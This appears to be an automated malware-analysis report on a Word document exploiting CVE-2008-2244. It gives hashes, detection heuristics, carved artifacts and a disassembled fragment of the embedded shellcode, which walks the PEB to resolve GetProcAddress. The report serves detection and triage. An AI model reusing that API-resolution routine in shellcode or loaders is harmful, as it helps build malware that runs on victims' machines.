Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2217e61a733cb22b…

MALICIOUS

Office (OLE)

Size: 47.6 KB
Created: 2005-06-22 09:51:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 20e45b05818f3d5ee2b447027436dde2
SHA-1: 91d0225498e9690eac38c3c0fe257d5b146fa5a3
SHA-256: 2217e61a733cb22bf9f66c740c363c3e96462f4be3d0c722749b192b76b58342
Risk Score: 410

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic

The sample is a Microsoft Word document that exploits CVE-2008-2244 to execute an embedded PE executable. The VBA macro is minimal and does not appear to contain malicious logic itself, but the embedded executable is the primary payload. The document body content is unrelated to the malicious functionality.

Heuristics (11)

  • CVE-2008-2244 — Microsoft Word record-parsing payload (critical; CVE likely; CVE_2008_2244)
    Word OLE document has normal small WordDocument/table streams, a large unallocated OLE slack region, and an executable or resolver shellcode payload in that slack. This is the static shape of the MS08-042 Word record-parsing exploit family tracked as CVE-2008-2244.
  • ClamAV: Win.Exploit.MS03-1 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Win.Exploit.MS03-1
  • Embedded PE executable (critical; OLE_EMBEDDED_EXE)
    MZ/PE header found inside document — possible embedded executable
  • PEB access via FS segment (x86) (high; SC_PEB_ACCESS)
    PEB access via FS segment (x86)
    Disassembly (attempted x86 opcode disassembly):
    000019A5  648b1530000000    mov edx, dword ptr fs:[0x30]
    000019AC  e9df020000        jmp 0x1c90
    000019B1  8f85c4feffff      pop dword ptr [ebp - 0x13c]
    000019B7  8b420c            mov eax, dword ptr [edx + 0xc]
    000019BA  8b701c            mov esi, dword ptr [eax + 0x1c]
    000019BD  ad                lodsd eax, dword ptr [esi]
    000019BE  8b7808            mov edi, dword ptr [eax + 8]
    000019C1  89bdccfeffff      mov dword ptr [ebp - 0x134], edi
    000019C7  8b473c            mov eax, dword ptr [edi + 0x3c]
    000019CA  8b540778          mov edx, dword ptr [edi + eax + 0x78]
    000019CE  03d7              add edx, edi
    000019D0  8b5a20            mov ebx, dword ptr [edx + 0x20]
    000019D3  03df              add ebx, edi
    000019D5  33c9              xor ecx, ecx
    000019D7  41                inc ecx
    000019D8  8b348b            mov esi, dword ptr [ebx + ecx*4]
    000019DB  03f7              add esi, edi
    000019DD  b847657450        mov eax, 0x50746547
    000019E2  3b06              cmp eax, dword ptr [esi]
    000019E4  75f1              jne 0x19d7
    000019E6  b8726f6341        mov eax, 0x41636f72
    000019EB  3b4604            cmp eax, dword ptr [esi + 4]
    000019EE  75e7              jne 0x19d7
    000019F0  8b5a24            mov ebx, dword ptr [edx + 0x24]
    000019F3  03df              add ebx, edi
    000019F5  668b0c4b          mov cx, word ptr [ebx + ecx*2]
    000019F9  8b5a1c            mov ebx, dword ptr [edx + 0x1c]
    000019FC  03df              add ebx, edi
    000019FE  8b048b            mov eax, dword ptr [ebx + ecx*4]
    00001A01  03c7              add eax, edi
    00001A03  89                .byte 0x89
    00001A04  85                .byte 0x85
  • Reference to CreateProcess API (high; SC_STR_CREATEPROCESS)
    Reference to CreateProcess API
  • Reference to LoadLibrary API (high; SC_STR_LOADLIBRARY)
    Reference to LoadLibrary API
  • Reference to GetProcAddress API (high; SC_STR_GETPROCADDRESS)
    Reference to GetProcAddress API
  • OLE document has large unaccounted-for region (high; OLE_SLACK_ANOMALY)
    OLE file is 48,710 bytes but its declared streams total only 21,777 bytes — 26,933 bytes (55%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Reference to VirtualProtect API (medium; SC_STR_VIRTUALPROTECT)
    Reference to VirtualProtect API
  • VBA project contains no executable statements (low; OLE_VBA_MACROS)
    Document contains a VBA project, but the extracted modules contain only attributes/options/comments and no executable statements.
  • Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 369 bytes
    SHA-256: 0a0073e6700d52a50d0c1e9ea0537e97be4dbdf563f1ead10aa7aa70adf4375d
    Preview script (first 1,000 lines of the extracted script):
    Attribute VB_Name = "ThisDocument"
    Attribute VB_Base = "1Normal.ThisDocument"
    Attribute VB_GlobalNameSpace = False
    Attribute VB_Creatable = False
    Attribute VB_PredeclaredId = True
    Attribute VB_Exposed = True
    Attribute VB_TemplateDerived = True
    Attribute VB_Customizable = True
    Attribute VB_Control = "PropertyTreeCtl1, 0, 0, PROPERTYTREELib, PropertyTreeCtl"
embedded_office_00006a00.exe | embedded-pe | Office MZ+PE at offset 0x6A00 | 21574 bytes
    SHA-256: 9cacee6c891d8ac59e2e7896a746b8da8e66221d5039696f804d5a36ea10b65e
    Detection: ClamAV: No threats found
    Obfuscation or payload: likely
    Carved artifact entropy is 7.61, consistent with packed or encrypted content.